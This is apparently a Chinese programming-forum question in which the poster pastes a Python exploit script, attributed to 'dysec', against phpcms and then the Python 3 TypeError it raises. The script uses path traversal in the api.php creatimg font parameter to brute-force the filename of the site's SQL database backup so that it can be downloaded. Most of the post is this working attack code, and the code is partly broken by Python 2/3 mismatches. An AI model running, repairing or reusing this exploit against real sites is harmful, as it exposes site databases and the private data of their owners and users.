问题遇到的现象和发生背景
#!/usr/bin/env python
# coding=utf-8
'''
author: dysec
'''
import urllib.parse as urllib
import urllib.request as urllib2
def check(url):
mark = True
req = urllib2.Request(url)
req.add_header('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')
response = urllib2.urlopen(req)
content = response.read()
if 'Cannot' in content:
mark = False
return mark
def guest(target):
arr = []
num = map(chr, range(48, 58))
alpha = map(chr, range(97, 123))
exploit = '%s/api.php?op=creatimg&txt=dysec&font=/../../../../caches/bakup/default/%s%s<<.sql'
while True:
for char in num:
if check(exploit % (target, ''.join(arr), char)):
arr.append(char)
continue
if len(arr) < 20:
for char in alpha:
if check(exploit % (target, ''.join(arr), char)):
arr.append(char)
continue
elif len(arr) == 20:
arr.append('_db_')
elif len(arr) == 29:
arr.append('_1.sql')
break
if len(arr) < 1:
print
'[*]not find!'
return
print
'[*]find: %s/caches/bakup/default/%s' % (target, ''.join(arr))
if __name__ == "__main__":
url = 'http://www.k.com/'
# test
guest(url)
Traceback (most recent call last):
File "/root/Desktop/phpcms_sql.py", line 56, in <module>
guest(url)
File "/root/Desktop/phpcms_sql.py", line 27, in guest
if check(exploit % (target, ''.join(arr), char)):
File "/root/Desktop/phpcms_sql.py", line 15, in check
if 'Cannot' in content:
TypeError: a bytes-like object is required, not 'str'
